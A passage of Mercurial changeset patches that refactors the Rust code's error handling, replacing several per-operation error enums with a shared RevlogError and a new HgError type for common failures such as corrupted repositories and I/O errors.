CatRevError::UnknowRevlogDataFormat(format) - } - } - } -} - /// List files under Mercurial control at a given revision. /// /// * `root`: Repository root @@ -63,13 +28,13 @@ repo: &Repo, revset: &str, files: &[HgPathBuf], -) -> Result<Vec<u8>, CatRevError> { +) -> Result<Vec<u8>, RevlogError> { let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) 
- .map_err(|_| CatRevError::CorruptedRevlog)?; + .map_err(|_| RevlogError::Corrupted)?; let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; @@ -82,7 +47,7 @@ let file_log = Revlog::open(repo, &index_path, Some(&data_path))?; let file_node = Node::from_hex(node_bytes) - .map_err(|_| CatRevError::CorruptedRevlog)?; + .map_err(|_| RevlogError::Corrupted)?; let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -15,47 +15,12 @@ Manifest, } -/// Error type for `debug_data` -#[derive(Debug, derive_more::From)] -pub enum DebugDataError { - /// Error when reading a `revlog` file. - #[from] - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -impl From<RevlogError> for DebugDataError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => DebugDataError::IoError(err), - RevlogError::UnsuportedVersion(version) => { - DebugDataError::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => DebugDataError::InvalidRevision, - RevlogError::AmbiguousPrefix => DebugDataError::AmbiguousPrefix, - RevlogError::Corrupted => DebugDataError::CorruptedRevlog, - RevlogError::UnknowDataFormat(format) => { - DebugDataError::UnknowRevlogDataFormat(format) - } - } - } -} - /// Dump the contents data of a revision. 
pub fn debug_data( repo: &Repo, revset: &str, kind: DebugDataKind, -) -> Result<Vec<u8>, DebugDataError> { +) -> Result<Vec<u8>, RevlogError> { let index_file = match kind { DebugDataKind::Changelog => "00changelog.i", DebugDataKind::Manifest => "00manifest.i", diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -14,7 +14,6 @@ use crate::utils::hg_path::HgPath; use crate::{DirstateParseError, EntryState}; use rayon::prelude::*; -use std::convert::From; /// Error type for `Dirstate` methods #[derive(Debug, derive_more::From)] @@ -55,59 +54,17 @@ } } -/// Error type `list_rev_tracked_files` -#[derive(Debug)] -pub enum ListRevTrackedFilesError { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -impl From<RevlogError> for ListRevTrackedFilesError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => { - ListRevTrackedFilesError::IoError(err) - } - RevlogError::UnsuportedVersion(version) => { - ListRevTrackedFilesError::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => { - ListRevTrackedFilesError::InvalidRevision - } - RevlogError::AmbiguousPrefix => { - ListRevTrackedFilesError::AmbiguousPrefix - } - RevlogError::Corrupted => { - ListRevTrackedFilesError::CorruptedRevlog - } - RevlogError::UnknowDataFormat(format) => { - ListRevTrackedFilesError::UnknowRevlogDataFormat(format) - } - } - } -} - /// List files under Mercurial control at a given revision. 
pub fn list_rev_tracked_files( repo: &Repo, revset: &str, -) -> Result<FilesForRev, ListRevTrackedFilesError> { +) -> Result<FilesForRev, RevlogError> { let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .or(Err(ListRevTrackedFilesError::CorruptedRevlog))?; + .map_err(|_| RevlogError::Corrupted)?; let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -7,10 +7,8 @@ mod dirstate_status; mod find_root; mod list_tracked_files; -pub use cat::{cat, CatRevError}; -pub use debugdata::{debug_data, DebugDataError, DebugDataKind}; +pub use cat::cat; +pub use debugdata::{debug_data, DebugDataKind}; pub use find_root::{find_root, find_root_from_path, FindRootError}; -pub use list_tracked_files::{ - list_rev_tracked_files, FilesForRev, ListRevTrackedFilesError, -}; +pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; pub use list_tracked_files::{Dirstate, ListDirstateTrackedFilesError}; diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -2,11 +2,9 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; use format_bytes::format_bytes; -use hg::operations::{ - CatRevError, DebugDataError, FindRootError, ListDirstateTrackedFilesError, - ListRevTrackedFilesError, -}; +use hg::operations::{FindRootError, ListDirstateTrackedFilesError}; use hg::requirements::RequirementsError; +use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; use std::convert::From; use std::path::PathBuf; @@ -99,27 +97,27 @@ } } -impl From<(DebugDataError, &str)> for CommandError { - fn from((err, 
rev): (DebugDataError, &str)) -> CommandError { +impl From<(RevlogError, &str)> for CommandError { + fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { - DebugDataError::IoError(err) => CommandError::Abort(Some( + RevlogError::IoError(err) => CommandError::Abort(Some( utf8_to_local(&format!("abort: {}\n", err)).into(), )), - DebugDataError::InvalidRevision => CommandError::Abort(Some( + RevlogError::InvalidRevision => CommandError::Abort(Some( utf8_to_local(&format!( - "abort: invalid revision identifier{}\n", + "abort: invalid revision identifier {}\n", rev )) .into(), )), - DebugDataError::AmbiguousPrefix => CommandError::Abort(Some( + RevlogError::AmbiguousPrefix => CommandError::Abort(Some( utf8_to_local(&format!( - "abort: ambiguous revision identifier{}\n", + "abort: ambiguous revision identifier {}\n", rev )) .into(), )), - DebugDataError::UnsuportedRevlogVersion(version) => { + RevlogError::UnsuportedVersion(version) => { CommandError::Abort(Some( utf8_to_local(&format!( "abort: unsupported revlog version {}\n", @@ -128,104 +126,10 @@ .into(), )) } - DebugDataError::CorruptedRevlog => { + RevlogError::Corrupted => { CommandError::Abort(Some("abort: corrupted revlog\n".into())) } - DebugDataError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } - } -} - -impl From<(ListRevTrackedFilesError, &str)> for CommandError { - fn from((err, rev): (ListRevTrackedFilesError, &str)) -> CommandError { - match err { - ListRevTrackedFilesError::IoError(err) => CommandError::Abort( - Some(utf8_to_local(&format!("abort: {}\n", err)).into()), - ), - ListRevTrackedFilesError::InvalidRevision => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesError::AmbiguousPrefix => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: 
ambiguous revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - ListRevTrackedFilesError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - ListRevTrackedFilesError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } - } -} - -impl From<(CatRevError, &str)> for CommandError { - fn from((err, rev): (CatRevError, &str)) -> CommandError { - match err { - CatRevError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - CatRevError::InvalidRevision => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )), - CatRevError::AmbiguousPrefix => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )), - CatRevError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - CatRevError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - CatRevError::UnknowRevlogDataFormat(format) => { + RevlogError::UnknowDataFormat(format) => { CommandError::Abort(Some( utf8_to_local(&format!( "abort: unknow revlog dataformat {:?}\n", # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611749989 -3600 # Wed Jan 27 13:19:49 2021 +0100 # Node ID 39e9407820ac571d6040b8672c32bb943f7438aa # Parent b274aa2f20fd61b272a004d367a3ae10ece72716 rust: Introduce an `HgError` enum for common error cases Differential Revision: https://phab.mercurial-scm.org/D9892 diff --git 
a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/errors.rs @@ -0,0 +1,111 @@ +use std::fmt; + +/// Common error cases that can happen in many different APIs +#[derive(Debug)] +pub enum HgError { + IoError { + error: std::io::Error, + context: IoErrorContext, + }, + + /// A file under `.hg/` normally only written by Mercurial + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + CorruptedRepository(String), + + /// The respository or requested operation involves a feature not + /// supported by the Rust implementation. Falling back to the Python + /// implementation may or may not work. + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + UnsupportedFeature(String), +} + +/// Details about where an I/O error happened +#[derive(Debug, derive_more::From)] +pub enum IoErrorContext { + /// A filesystem operation returned `std::io::Error` + #[from] + File(std::path::PathBuf), + /// `std::env::current_dir` returned `std::io::Error` + CurrentDir, +} + +impl HgError { + pub fn corrupted(explanation: impl Into<String>) -> Self { + HgError::CorruptedRepository(explanation.into()) + } +} + +// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? +impl fmt::Display for HgError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + match self { + HgError::IoError { error, context } => { + write!(f, "{}: {}", error, context) + } + HgError::CorruptedRepository(explanation) => { + write!(f, "corrupted repository: {}", explanation) + } + HgError::UnsupportedFeature(explanation) => { + write!(f, "unsupported feature: {}", explanation) + } + } + } +} + +// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? 
+impl fmt::Display for IoErrorContext { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + match self { + IoErrorContext::File(path) => path.display().fmt(f), + IoErrorContext::CurrentDir => f.write_str("current directory"), + } + } +} + +pub trait IoResultExt<T> { + /// Annotate a possible I/O error as related to a file at the given path. + /// + /// This allows printing something like “File not found: example.txt” + /// instead of just “File not found”. + /// + /// Converts a `Result` with `std::io::Error` into one with `HgError`. + fn for_file(self, path: &std::path::Path) -> Result<T, HgError>; +} + +impl<T> IoResultExt<T> for std::io::Result<T> { + fn for_file(self, path: &std::path::Path) -> Result<T, HgError> { + self.map_err(|error| HgError::IoError { + error, + context: IoErrorContext::File(path.to_owned()), + }) + } +} + +pub trait HgResultExt<T> { + /// Handle missing files separately from other I/O error cases. + /// + /// Wraps the `Ok` type in an `Option`: + /// + /// * `Ok(x)` becomes `Ok(Some(x))` + /// * An I/O "not found" error becomes `Ok(None)` + /// * Other errors are unchanged + fn io_not_found_as_none(self) -> Result<Option<T>, HgError>; +} + +impl<T> HgResultExt<T> for Result<T, HgError> { + fn io_not_found_as_none(self) -> Result<Option<T>, HgError> { + match self { + Ok(x) => Ok(Some(x)), + Err(HgError::IoError { error, .. }) + if error.kind() == std::io::ErrorKind::NotFound => + { + Ok(None) + } + Err(other_error) => Err(other_error), + } + } +} diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -5,6 +5,7 @@ // GNU General Public License version 2 or any later version. 
mod ancestors; pub mod dagops; +pub mod errors; pub use ancestors::{AncestorsIterator, LazyAncestors, MissingAncestors}; mod dirstate; pub mod discovery; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611751288 -3600 # Wed Jan 27 13:41:28 2021 +0100 # Node ID 68a15b5a7e58c37586938adb32a2468b4e1ec362 # Parent 39e9407820ac571d6040b8672c32bb943f7438aa rust: Replace DirstatePackError with HgError Differential Revision: https://phab.mercurial-scm.org/D9893 diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -3,10 +3,11 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. +use crate::errors::HgError; use crate::utils::hg_path::HgPath; use crate::{ dirstate::{CopyMap, EntryState, StateMap}, - DirstateEntry, DirstatePackError, DirstateParents, DirstateParseError, + DirstateEntry, DirstateParents, DirstateParseError, }; use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt}; use micro_timer::timed; @@ -90,7 +91,7 @@ copy_map: &CopyMap, parents: DirstateParents, now: Duration, -) -> Result<Vec<u8>, DirstatePackError> { +) -> Result<Vec<u8>, HgError> { // TODO move away from i32 before 2038. 
let now: i32 = now.as_secs().try_into().expect("time overflow"); @@ -136,16 +137,23 @@ new_filename.extend(copy.bytes()); } - packed.write_u8(entry.state.into())?; - packed.write_i32::<BigEndian>(entry.mode)?; - packed.write_i32::<BigEndian>(entry.size)?; - packed.write_i32::<BigEndian>(new_mtime)?; - packed.write_i32::<BigEndian>(new_filename.len() as i32)?; + // Unwrapping because `impl std::io::Write for Vec<u8>` never errors + packed.write_u8(entry.state.into()).unwrap(); + packed.write_i32::<BigEndian>(entry.mode).unwrap(); + packed.write_i32::<BigEndian>(entry.size).unwrap(); + packed.write_i32::<BigEndian>(new_mtime).unwrap(); + packed + .write_i32::<BigEndian>(new_filename.len() as i32) + .unwrap(); packed.extend(new_filename) } if packed.len() != expected_size { - return Err(DirstatePackError::BadSize(expected_size, packed.len())); + return Err(HgError::CorruptedRepository(format!( + "bad dirstate size: {} != {}", + expected_size, + packed.len() + ))); } Ok(packed) diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -79,19 +79,6 @@ } #[derive(Debug, PartialEq)] -pub enum DirstatePackError { - CorruptedEntry(String), - CorruptedParent, - BadSize(usize, usize), -} - -impl From<std::io::Error> for DirstatePackError { - fn from(e: std::io::Error) -> Self { - DirstatePackError::CorruptedEntry(e.to_string()) - } -} - -#[derive(Debug, PartialEq)] pub enum DirstateMapError { PathNotFound(HgPathBuf), EmptyPath, @@ -113,9 +100,9 @@ #[derive(Debug, derive_more::From)] pub enum DirstateError { Parse(DirstateParseError), - Pack(DirstatePackError), Map(DirstateMapError), IO(std::io::Error), + Common(errors::HgError), } #[derive(Debug, derive_more::From)] diff --git a/rust/hg-cpython/src/parsers.rs b/rust/hg-cpython/src/parsers.rs --- a/rust/hg-cpython/src/parsers.rs +++ b/rust/hg-cpython/src/parsers.rs @@ -15,8 +15,7 @@ }; use hg::{ pack_dirstate, parse_dirstate, utils::hg_path::HgPathBuf, 
DirstateEntry, - DirstatePackError, DirstateParents, DirstateParseError, FastHashMap, - PARENT_SIZE, + DirstateParents, DirstateParseError, FastHashMap, PARENT_SIZE, }; use std::convert::TryInto; @@ -128,18 +127,9 @@ } Ok(PyBytes::new(py, &packed)) } - Err(error) => Err(PyErr::new::<exc::ValueError, _>( - py, - match error { - DirstatePackError::CorruptedParent => { - "expected a 20-byte hash".to_string() - } - DirstatePackError::CorruptedEntry(e) => e, - DirstatePackError::BadSize(expected, actual) => { - format!("bad dirstate size: {} != {}", actual, expected) - } - }, - )), + Err(error) => { + Err(PyErr::new::<exc::ValueError, _>(py, error.to_string())) + } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611752421 -3600 # Wed Jan 27 14:00:21 2021 +0100 # Node ID 776b97179c0617424b71c039de1ce6eb4b7daab2 # Parent 68a15b5a7e58c37586938adb32a2468b4e1ec362 rust: Remove DirstateParseError and ListDirstateTrackedFilesError Use HgError instead. Differential Revision: https://phab.mercurial-scm.org/D9894 diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -5,7 +5,8 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::{utils::hg_path::HgPathBuf, DirstateParseError, FastHashMap}; +use crate::errors::HgError; +use crate::{utils::hg_path::HgPathBuf, FastHashMap}; use std::collections::hash_map; use std::convert::TryFrom; @@ -60,7 +61,7 @@ } impl TryFrom<u8> for EntryState { - type Error = DirstateParseError; + type Error = HgError; fn try_from(value: u8) -> Result<Self, Self::Error> { match value { @@ -69,8 +70,8 @@ b'r' => Ok(EntryState::Removed), b'm' => Ok(EntryState::Merged), b'?' 
=> Ok(EntryState::Unknown), - _ => Err(DirstateParseError::CorruptedEntry(format!( - "Incorrect entry state {}", + _ => Err(HgError::CorruptedRepository(format!( + "Incorrect dirstate entry state {}", value ))), } diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -5,6 +5,7 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. +use crate::errors::HgError; use crate::revlog::node::NULL_NODE_ID; use crate::{ dirstate::{parsers::PARENT_SIZE, EntryState, SIZE_FROM_OTHER_PARENT}, @@ -14,7 +15,7 @@ hg_path::{HgPath, HgPathBuf}, }, CopyMap, DirsMultiset, DirstateEntry, DirstateError, DirstateMapError, - DirstateParents, DirstateParseError, FastHashMap, StateMap, + DirstateParents, FastHashMap, StateMap, }; use micro_timer::timed; use std::collections::HashSet; @@ -370,7 +371,9 @@ p2: NULL_NODE_ID, }; } else { - return Err(DirstateError::Parse(DirstateParseError::Damaged)); + return Err( + HgError::corrupted("Dirstate appears to be damaged").into() + ); } self.parents = Some(parents); diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -7,7 +7,7 @@ use crate::utils::hg_path::HgPath; use crate::{ dirstate::{CopyMap, EntryState, StateMap}, - DirstateEntry, DirstateParents, DirstateParseError, + DirstateEntry, DirstateParents, }; use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt}; use micro_timer::timed; @@ -27,11 +27,9 @@ ); #[timed] -pub fn parse_dirstate( - contents: &[u8], -) -> Result<ParseResult, DirstateParseError> { +pub fn parse_dirstate(contents: &[u8]) -> Result<ParseResult, HgError> { if contents.len() < PARENT_SIZE * 2 { - return Err(DirstateParseError::TooLittleData); + return Err(HgError::corrupted("Too 
little data for dirstate.")); } let mut copies = vec![]; let mut entries = vec![]; @@ -44,19 +42,21 @@ while curr_pos < contents.len() { if curr_pos + MIN_ENTRY_SIZE > contents.len() { - return Err(DirstateParseError::Overflow); + return Err(HgError::corrupted("Overflow in dirstate.")); } let entry_bytes = &contents[curr_pos..]; let mut cursor = Cursor::new(entry_bytes); - let state = EntryState::try_from(cursor.read_u8()?)?; - let mode = cursor.read_i32::<BigEndian>()?; - let size = cursor.read_i32::<BigEndian>()?; - let mtime = cursor.read_i32::<BigEndian>()?; - let path_len = cursor.read_i32::<BigEndian>()? as usize; + // Unwraping errors from `byteorder` as we’ve already checked + // `MIN_ENTRY_SIZE` so the input should never be too short. + let state = EntryState::try_from(cursor.read_u8().unwrap())?; + let mode = cursor.read_i32::<BigEndian>().unwrap(); + let size = cursor.read_i32::<BigEndian>().unwrap(); + let mtime = cursor.read_i32::<BigEndian>().unwrap(); + let path_len = cursor.read_i32::<BigEndian>().unwrap() as usize; if path_len > contents.len() - curr_pos { - return Err(DirstateParseError::Overflow); + return Err(HgError::corrupted("Overflow in dirstate.")); } // Slice instead of allocating a Vec needed for `read_exact` diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -51,33 +51,6 @@ /// write access to your repository, you have other issues. 
pub type FastHashMap<K, V> = HashMap<K, V, RandomXxHashBuilder64>; -#[derive(Clone, Debug, PartialEq)] -pub enum DirstateParseError { - TooLittleData, - Overflow, - // TODO refactor to use bytes instead of String - CorruptedEntry(String), - Damaged, -} - -impl From<std::io::Error> for DirstateParseError { - fn from(e: std::io::Error) -> Self { - DirstateParseError::CorruptedEntry(e.to_string()) - } -} - -impl ToString for DirstateParseError { - fn to_string(&self) -> String { - use crate::DirstateParseError::*; - match self { - TooLittleData => "Too little data for dirstate.".to_string(), - Overflow => "Overflow in dirstate.".to_string(), - CorruptedEntry(e) => format!("Corrupted entry: {:?}.", e), - Damaged => "Dirstate appears to be damaged.".to_string(), - } - } -} - #[derive(Debug, PartialEq)] pub enum DirstateMapError { PathNotFound(HgPathBuf), @@ -99,9 +72,7 @@ #[derive(Debug, derive_more::From)] pub enum DirstateError { - Parse(DirstateParseError), Map(DirstateMapError), - IO(std::io::Error), Common(errors::HgError), } diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -6,24 +6,16 @@ // GNU General Public License version 2 or any later version. 
use crate::dirstate::parsers::parse_dirstate; +use crate::errors::{HgError, IoResultExt}; use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::manifest::{Manifest, ManifestEntry}; use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; use crate::utils::hg_path::HgPath; -use crate::{DirstateParseError, EntryState}; +use crate::EntryState; use rayon::prelude::*; -/// Error type for `Dirstate` methods -#[derive(Debug, derive_more::From)] -pub enum ListDirstateTrackedFilesError { - /// Error when reading the `dirstate` file - IoError(std::io::Error), - /// Error when parsing the `dirstate` file - ParseError(DirstateParseError), -} - /// List files under Mercurial control in the working directory /// by reading the dirstate pub struct Dirstate { @@ -32,16 +24,18 @@ } impl Dirstate { - pub fn new(repo: &Repo) -> Result<Self, ListDirstateTrackedFilesError> { - let content = repo.hg_vfs().read("dirstate")?; + pub fn new(repo: &Repo) -> Result<Self, HgError> { + let content = repo + .hg_vfs() + .read("dirstate") + // TODO: this will be more accurate when we use `HgError` in + // `Vfs::read`. 
+ .for_file("dirstate".as_ref())?; Ok(Self { content }) } - pub fn tracked_files( - &self, - ) -> Result<Vec<&HgPath>, ListDirstateTrackedFilesError> { - let (_, entries, _) = parse_dirstate(&self.content) - .map_err(ListDirstateTrackedFilesError::ParseError)?; + pub fn tracked_files(&self) -> Result<Vec<&HgPath>, HgError> { + let (_, entries, _) = parse_dirstate(&self.content)?; let mut files: Vec<&HgPath> = entries .into_iter() .filter_map(|(path, entry)| match entry.state { diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -10,5 +10,5 @@ pub use cat::cat; pub use debugdata::{debug_data, DebugDataKind}; pub use find_root::{find_root, find_root_from_path, FindRootError}; +pub use list_tracked_files::Dirstate; pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; -pub use list_tracked_files::{Dirstate, ListDirstateTrackedFilesError}; diff --git a/rust/hg-cpython/src/dirstate.rs b/rust/hg-cpython/src/dirstate.rs --- a/rust/hg-cpython/src/dirstate.rs +++ b/rust/hg-cpython/src/dirstate.rs @@ -24,10 +24,7 @@ exc, PyBytes, PyDict, PyErr, PyList, PyModule, PyObject, PyResult, PySequence, Python, }; -use hg::{ - utils::hg_path::HgPathBuf, DirstateEntry, DirstateParseError, EntryState, - StateMap, -}; +use hg::{utils::hg_path::HgPathBuf, DirstateEntry, EntryState, StateMap}; use libc::{c_char, c_int}; use std::convert::TryFrom; @@ -79,11 +76,10 @@ .map(|(filename, stats)| { let stats = stats.extract::<PySequence>(py)?; let state = stats.get_item(py, 0)?.extract::<PyBytes>(py)?; - let state = EntryState::try_from(state.data(py)[0]).map_err( - |e: DirstateParseError| { + let state = + EntryState::try_from(state.data(py)[0]).map_err(|e| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) - }, - )?; + })?; let mode = stats.get_item(py, 1)?.extract(py)?; let size = stats.get_item(py, 2)?.extract(py)?; let mtime = stats.get_item(py, 
3)?.extract(py)?; diff --git a/rust/hg-cpython/src/dirstate/dirs_multiset.rs b/rust/hg-cpython/src/dirstate/dirs_multiset.rs --- a/rust/hg-cpython/src/dirstate/dirs_multiset.rs +++ b/rust/hg-cpython/src/dirstate/dirs_multiset.rs @@ -18,9 +18,9 @@ use crate::dirstate::extract_dirstate; use hg::{ + errors::HgError, utils::hg_path::{HgPath, HgPathBuf}, - DirsMultiset, DirsMultisetIter, DirstateMapError, DirstateParseError, - EntryState, + DirsMultiset, DirsMultisetIter, DirstateMapError, EntryState, }; py_class!(pub class Dirs |py| { @@ -38,7 +38,7 @@ skip_state = Some( skip.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, ); @@ -46,7 +46,7 @@ let inner = if let Ok(map) = map.cast_as::<PyDict>(py) { let dirstate = extract_dirstate(py, &map)?; DirsMultiset::from_dirstate(&dirstate, skip_state) - .map_err(|e| { + .map_err(|e: DirstateMapError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })? 
} else { diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -26,10 +26,10 @@ dirstate::{dirs_multiset::Dirs, make_dirstate_tuple}, }; use hg::{ + errors::HgError, utils::hg_path::{HgPath, HgPathBuf}, DirsMultiset, DirstateEntry, DirstateMap as RustDirstateMap, - DirstateMapError, DirstateParents, DirstateParseError, EntryState, - StateMapIter, PARENT_SIZE, + DirstateMapError, DirstateParents, EntryState, StateMapIter, PARENT_SIZE, }; // TODO @@ -84,13 +84,13 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, DirstateEntry { state: state.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, mode: mode.extract(py)?, @@ -113,7 +113,7 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, size.extract(py)?, @@ -137,7 +137,7 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, ) diff --git a/rust/hg-cpython/src/parsers.rs b/rust/hg-cpython/src/parsers.rs --- a/rust/hg-cpython/src/parsers.rs +++ b/rust/hg-cpython/src/parsers.rs @@ -15,7 +15,7 @@ }; use hg::{ pack_dirstate, parse_dirstate, utils::hg_path::HgPathBuf, DirstateEntry, - DirstateParents, DirstateParseError, FastHashMap, PARENT_SIZE, + DirstateParents, FastHashMap, PARENT_SIZE, }; use std::convert::TryInto; @@ -58,21 +58,7 @@ 
